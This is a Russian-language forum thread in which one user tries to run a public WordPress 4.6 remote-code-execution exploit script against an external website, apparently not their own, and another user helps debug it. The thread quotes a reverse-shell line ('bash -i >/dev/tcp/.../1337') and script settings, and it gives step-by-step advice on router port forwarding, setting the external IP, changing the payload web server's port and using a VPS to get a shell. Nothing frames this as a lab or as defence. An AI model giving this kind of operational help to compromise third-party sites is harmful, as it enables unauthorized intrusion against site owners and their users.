Хочу проэксплуатировать WP 4.6 Remote Code Execution.
Сам сплойт: https://exploitbox.io/exploit/wordpress-rce-exploit.sh.
Есть сайт нужной версии, в системе есть netcat.
При запуске: ./wordpress-rce-exploit.sh site.com я вижу в консоли какой-то HTML и просто всё подвисает, нет сообщения о неудачное эксплуатации и т.д. А рядом создаётся файл rce.txt с содержимым:
(sleep 3s && nohup bash -i >/dev/tcp/192.168.57.1/1337 0&1) &

Что я делаю не так и как правильно проэксплуатировать

Ага! Среди кучи HTML-я заметил это:

Listening on 0.0.0.0 1337
В скрипте я вписал свой IP rev_host="192.168.0.4", именно этот адресс указан в веб-морде роутера

Если ты пробиваешь внешний сайт (не из твоей локалки), то нужно указывать свой внешний айпишник + пробросить порты на роутере (один для веб сервера, который поднимается питоном - 80 и один для шелла - 1337).
Либо юзать какой-то промежуточный VPS/VDS.

Pernat1y сказал(а):

Если ты пробиваешь внешний сайт (не из твоей локалки), то нужно указывать свой внешний айпишник + пробросить порты на роутере (один для веб сервера, который поднимается питоном - 80 и один для шелла - 1337).
Либо юзать какой-то промежуточный VPS/VDS.


Да. Сайт не из моей локали

Pernat1y сказал(а):

пробросить порты на роутере (один для веб сервера, который поднимается питоном - 80 и один для шелла - 1337)


А не подскажите по пробросу, я просто никогда этого не делал... Как правильно это сделать?
У меня сейчас так:

Порт сервисаIP-адресВнутренний портПротоколСостояниеИзме нить

1337192.168.0.41337TCP или UDPВключеноИзменить

Я на правильном пути?

CryNet сказал(а):

Я на правильном пути?

Похоже.
Дальше в эксплоите свой внешний айпишник используй. Если не прокатит, то есть вероятность того, что на твоём провайдере такое не заработает. Тогда копать в сторону VPS/VDS.

Pernat1y сказал(а):

Похоже.
Дальше в эксплоите свой внешний айпишник используй. Если не прокатит, то есть вероятность того, что на твоём провайдере такое не заработает. Тогда копать в сторону VPS/VDS.


А 80 я не могу пробросить: Ошибка: Порт удалённого управления веб-интерфейсом конфликтует с портом виртуального сервера.

CryNet сказал(а):

А 80 я не могу пробросить: Ошибка: Порт удалённого управления веб-интерфейсом конфликтует с портом виртуального сервера.


Поправь порт, на котором будет слушать веб сервер на питоне и откуда будет забирать файл эксполоит.

Pernat1y сказал(а):

Поправь порт, на котором будет слушать веб сервер на питоне и откуда будет забирать файл эксполоит.


Не-е-е... та же ошибка...

Код:



Warning: Inverse name lookup failed for `0.0.5.57'
Listening on any address 43069


Сейчас проброс выглядит так:

Порт сервисаIP-адресВнутренний портПротоколСостояниеИзме нить

1337192.168.0.41337TCP или UDPВключеноИзменить81192.168.0.481 TCP или UDPВключеноИзменить

CryNet сказал(а):

`0.0.5.57'


Ничего не смущает?

Тебе в скрипте нужно поправить:


rev_host="192.168.57.1"

на твой внешний айпишник
И тут

python -mSimpleHTTPServer 80 2>/dev/null >&2 &

заменить порт на 81.

Pernat1y сказал(а):

Ничего не смущает?

Тебе в скрипте нужно поправить:


rev_host="192.168.57.1"

на твой внешний айпишник
И тут

python -mSimpleHTTPServer 80 2>/dev/null >&2 &

заменить порт на 81.


Та это я-то сделал. Результат тот же.

CryNet сказал(а):

Та это я-то сделал. Результат тот же.


Покажи полный скрипт, с какими параметрами запускается и полный вывод.
Сайт и свой айпишник можно не светить

Pernat1y сказал(а):

Покажи полный скрипт, с какими параметрами запускается и полный вывод.
Сайт и свой айпишник можно не светить

Скрипт: #!/bin/bash## __ __ __ __ __# / - Pastebin.com
Запуск: ./wordpress-rce-exploit.sh site.info
Вывод: <meta - Pastebin.com

Мне кажеться тут ещё дело в том, что на одном IP несколько сайтов. Например при запуска аналогичного эксплойта в Метасплойте (он там, кстати, тоже есть), последний выдаёт ошибку выводя IP-адресс моего таргета и спрашивая "тут точно установлен WordPress?". Ну а перейдя по IP выводится заглушка хостера. Хотя я в RHOST указал именно адресс сайта, а не его IP.